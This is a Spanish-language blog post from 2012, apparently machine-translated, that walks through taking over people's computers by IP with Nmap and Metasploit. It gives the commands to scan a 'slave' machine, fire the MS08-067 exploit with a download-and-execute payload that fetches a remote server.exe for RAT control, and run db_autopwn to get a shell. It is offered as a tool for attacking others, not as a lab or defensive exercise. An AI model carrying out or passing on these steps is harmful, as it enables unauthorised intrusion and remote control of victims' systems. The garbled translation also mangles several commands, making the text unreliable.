miércoles, 3 de octubre de 2012

Infectar a las personas a través de IP y Metasploit

Infect En Metasploit

Microsoft_Bug+moften+hack4life.jpg (405×269)



Veo a esta pregunta en algunos foros que "es posible infectar a las personas que utilizan su IP?"

Por lo tanto, voy a mostrarte cómo hacerlo.

Requisitos:
1). Nmap
2). Metasploit

Paso 1

En primer lugar usted necesita IP de destino de su esclavo.

A continuación, abra la consola de Metasploit & type

Código:
db_create

Una vez hecho eso Nmap tipo

A continuación, tiene que escribir: -

Código:
db_nmap-sT-sV destino> ip>


[Esta-ll exploración OS, puertos y servicios que se ejecutan en el ordenador esclavo-s.]
Espere 5 minutos-s para completar su exploración.

 

Una vez hecho esto, anote el SO, Puertos y servicios que se ejecutan en el ordenador esclavo-s.

Ahora-s tiempo para explotar Slave-s máquina.
Explotar depende del sistema operativo, puertos y servicios que se ejecutan en el ordenador esclavo-s.

Así que-suerte si consigues OS WIN XP o 2000, ya que-s fácil para explotarlos.

No importa el tiempo que re-protegido por cualquier firewall o no.

Ahora va a decir u las hazañas

Tipo de "exploits espectáculo"

A continuación, tiene que escribir su uso

Código:
windows/smb/ms08_067_netapi

Ahora escribe objetivos muestran

Ahora escriba meta establecida 0 -> Este-LL objetivo fijado en 0 especificada.

A continuación, escriba "cargas útiles espectáculo"

Ahora escriba

Código:
establecido carga windows / download_exec


A continuación, escriba las opciones de show.
En la ventana de usted, verá muchas opciones, en la que se necesita para
Rellene sólo dos opciones rhost y URL.

tipo

Código:
establecer rhost <VICTIME_IP>


Tipo Siguiente

Código:
establecer http://www.site.com/server.exe URL


Por fin tienes que escribir exploit.

Ahora puede controlar eres esclavo con RAT.
Por lo tanto, todas las versiones de Win 2000-XP se puede explotar fácilmente.
En caso si usted didn t conseguir este OS-dos, inmediatamente después de Nmap scan
Puede utilizar el comando

Código:
db_autopwn-p-t-e.

En la mayoría de los casos se obtiene una shell.

NOTA: Este tut es sólo para METSAPLOIT 3 y no las versiones más nuevas

 

Gracias a RanD0wn de este hallazgo impresionante, atribuye a Él chicos
Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)